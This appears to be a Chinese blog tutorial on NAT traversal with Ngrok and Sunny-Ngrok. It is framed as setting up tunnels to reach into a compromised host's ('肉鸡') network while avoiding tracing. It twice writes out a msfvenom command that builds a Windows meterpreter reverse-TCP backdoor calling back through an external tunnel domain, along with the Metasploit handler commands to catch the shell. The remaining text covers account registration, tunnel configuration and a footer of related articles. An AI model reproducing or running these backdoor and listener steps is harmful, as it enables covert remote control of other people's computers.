【内网安全-隧道搭建】内网穿透_Ngrok上线(美版、国版二开)

本文涉及的产品
公网NAT网关,每月750个小时 15CU
简介: 【内网安全-隧道搭建】内网穿透_Ngrok上线(美版、国版二开)

一、准备


1、意义:


在代理连接肉鸡后实现本地渗透肉鸡网络架构


2、项目:


Linux:Proxychains

Windows:Sockscap Proxifier

穿透项目:Ngrok Frp Spp Nps EW(停更)

优点:穿透加密数据,中间平台,防追踪,解决网络问题

https://www.ngrok.cc

https://github.com/esrrhs/spp

https://github.com/fatedier/frp

https://github.com/ehang-io/nps

http://www.rootkiter.com/EarthWorm


二、内网穿透


1、简介:


1、内网穿透,也即 NAT 穿透,进行 NAT 穿透是为了使具有某一个特定源 IP 地址和源端口号的数据包不被 NAT 设备屏蔽而正确路由到内网主机。下面就相互通信的主机在网络中与 NAT 设备的相对位置介绍内网穿透方法。


2、UDP 内网穿透的实质是利用路由器上的NAT 系统。NAT 是一种将私有(保留)地址转化为合法IP地址的转换技术,它被广泛应用于各种类型 Internet 接入方式和各种类型的网络中。NAT可以完成重用地址,并且对于内部的网络结构可以实现对外隐蔽

(来源百度百科)


三、Ngrok(入门上线)


1、简述:


1)作用:ngrok 是一个反向代理,通过在公共的端点和本地运行的 Web 服务器之间建立一个安全的通道。ngrok 可捕获和分析所有通道上的流量,便于后期分析和重放。通过一个命令,便可将一个本地服务器暴露在NAT或防火墙后面的互联网。


2)官方解释:ngrok是一个简化的API优先入口即服务,它增加了连接性, 无需更改代码即可对您的应用程序进行安全性和可观察性


3)我的理解:


关键词:反向代理、公共、本地


通过反向代理,将局域网内的ip:port,转化为任何用户上网都可访问的URL一样


本地--->Ngrok服务器--->客户端


3)分析:


支持的协议:tcp、http、https

支持的类型:正向代理、反向代理


4)工具官网(美国的):


ngrok - Online in One Line

ngrok is the fastest way to put anything onthe internet with a single command.

https://ngrok.com/

74fd1ebe32ce45be9ea70cccf4c086a0.png


5)国产二开的管理平台:


Sunny-Ngrok


Sunny-Ngrok内网转发内网穿透 - 国内内网映射服务器

https://www.ngrok.cc/


23db804a78db4cc194539d3e0141fb21.png


2、Ngrok入门上线(国版二开)


1)注册并登陆:


Sunny-Ngrok内网转发内网穿透 - 国内内网映射服务器


点击进行注册(免费的)

c025a786c7e04023a377a63cf306eb04.png


090be8220b924ee1b90d5f0943529007.png



2)服务端配置:

实名认证--->开通隧道--->TCP协议--->指向IP和端口--->开通隧道--->连接隧道


——————


实名认证(2块钱就可了)


57bf62e1bfb74b6d81158022be46e1b0.png


填写相关信息


f773606efca647b5946bbf37fc71675a.png


使用支付宝扫码,进行人脸识别


5d8b27413c5b45e6bbc62f10054363d5.png

485cae6bd0c84e79a5227ca7db8bf373.png

——————


开通隧道(先拿0元的试手)


bb141666d2034d4786d13aecfdbb7383.png


——————


TCP协议--->域名进行设置--->指向IP和端口--->添加隧道--->确认开通


注意:


本地端口的填写,12.0.0.1代表localhost,紧接着的端口号是tomcat的端口号(可查看tomcat的server.xml文件中端口)


cc302beb2d3a48688e8aae4eff8be6a8.png



3)连接隧道:


下载客户端


d7b8f195660d43dbab04ffc216e10d9a.png


根据自己的下载合适的ngrok客户端

a3bcc7974a8e4d1e9839417e6dfadac5.png

打开ngrok客户端

aa5ef14ba3a64011888c7a764949af86.png

输入需要启动的隧道id


4bf91caa822f472e9b04ac8c71a89ae0.png

a576da99c34f4adca2b731c1a18b76dc.png

实现本地的网站,可以映射到外网了


1fb95057df0d4d49833972e6df2cfe81.png


4)客户端生成后门配置监听:


msfvenom -p windows/meterpreter/reverse_tcp lhost=free.idcfengye.com lport=80 -f exe -o tcp.exe


(注:lhos:外网ip、lport:外网端口)

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 0.0.0.0

set lport 8888

run


(注:这个监听端口lport,与本地转发端口一致)


扩展:


隧道管理的地方-->修改-->修改为自定义域名


3、相关工具:


1)natapp


NATAPP -

https://natapp.cn/tunnel/buy

基本类似使用


2、Ngrok入门上线(美版)


1)下载:


ngrok - download

https://ngrok.com/download


2)运行ngrok.exe


3)在Ngrok官网 注册账号


ngrok - Online in One Line

https://ngrok.com/

在用户中心找到authtoken(账户凭证)


方法一:


4)在ngrok命令行中输入:

ngrok authtoken 加上自己的凭据
配置成功会如下提示:
(创建.ngrok2文件夹、配置文件ngrok.yml)
Authtoken saved to configuration file: C:\Users\****/.ngrok2/ngrok.yml


5)连接隧道:


ngrok http 80
(指定的tcp协议,以及自己的服务端口)

方法二:


4*)配置账户


ngrok config add-authtoken 加上自己的凭据

5*)连接隧道


ngrok http 80
(指定的tcp协议,以及自己的服务端口)


6)客户端生成后门配置监听:

msfvenom -p windows/meterpreter/reverse_tcp lhost=free.idcfengye.com lport=80 -f exe -o tcp.exe


(注:lhos:外网ip、lport:外网端口)

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 0.0.0.0

set lport 8888

run


(注:这个监听端口lport,与本地转发端口一致)


相关实践学习
每个IT人都想学的“Web应用上云经典架构”实战
本实验从Web应用上云这个最基本的、最普遍的需求出发,帮助IT从业者们通过“阿里云Web应用上云解决方案”,了解一个企业级Web应用上云的常见架构,了解如何构建一个高可用、可扩展的企业级应用架构。
目录
相关文章
|
1月前
|
安全 文件存储 数据安全/隐私保护
贝锐花生壳全新客户端上线:远程威联通NAS,无需公网IP、简单3步!
为了实现随时随地访问和备份珍贵数据,贝锐花生壳推出专为威联通NAS设计的内网穿透方案。用户只需通过威联通NAS应用中心一键安装,即可享受无需公网IP的远程访问便利。此外,贝锐花生壳还提供自动部署HTTPS证书和访问控制功能,确保数据传输的安全性。群晖NAS用户同样可以通过套件中心一键安装使用。
56 0
贝锐花生壳全新客户端上线:远程威联通NAS,无需公网IP、简单3步!
|
网络协议 Linux 网络安全
如何用阿里云实现内网穿透?如何在外网访问家里内网设备?
使用NPS自建内网穿透服务器教程,带WEB管理
26296 10
|
3月前
|
文件存储 数据安全/隐私保护 Docker
搭建Jellyfin、Plex、Emby媒体服务,贝锐花生壳轻松内网穿透远程访问
Jellyfin、Plex 和 Emby 是流行的媒体服务方案,可在品牌 NAS 或自建 NAS 上组织、串流和管理多媒体藏品。利用集成的 Docker 或应用管理面板,可一键快速安装这些服务。贝锐花生壳提供无需公网 IP 的远程访问解决方案,支持 Docker 安装,轻松实现内网穿透,让用户随时随地访问媒体库。
130 0
|
5月前
|
弹性计算 网络协议 Linux
阿里云主机构建FRP内网穿透家用服务器避坑指南
详述了利用FRP工具搭建内网穿透的流程,包括阿里云ECS的配置、家用服务器的准备、FRP工具的下载与配置,以及通过SSH远程访问本地服务器的解决策略,确保了内外网间的稳定连接。
1358 1
阿里云主机构建FRP内网穿透家用服务器避坑指南
|
7月前
|
网络协议 安全 测试技术
Windows安装禅道系统结合Cpolar实现公网访问内网BUG管理服务
Windows安装禅道系统结合Cpolar实现公网访问内网BUG管理服务
|
7月前
|
监控 安全 网络安全
不买服务器也可以将本地服务放到互联网(ngrok内网穿透)
不买服务器也可以将本地服务放到互联网(ngrok内网穿透)
149 0
|
7月前
|
网络协议 安全 测试技术
如何在公网环境使用固定域名远程访问内网BUG管理系统协同办公
如何在公网环境使用固定域名远程访问内网BUG管理系统协同办公
|
网络协议 安全 测试技术
实现远程访问内网BUG管理系统的方法:使用Cpolar内网穿透技术
实现远程访问内网BUG管理系统的方法:使用Cpolar内网穿透技术
内网穿透—搭建私人kindle图书馆,实现公网访问
我们完全可以使用cpolar与calibre结合,建立自己的私人图书馆服务器,让我们能将想看的电子书储存起来,而不必再依靠亚马逊的书库。现在,就让我们看看应该如何操作吧。
内网穿透—搭建私人kindle图书馆,实现公网访问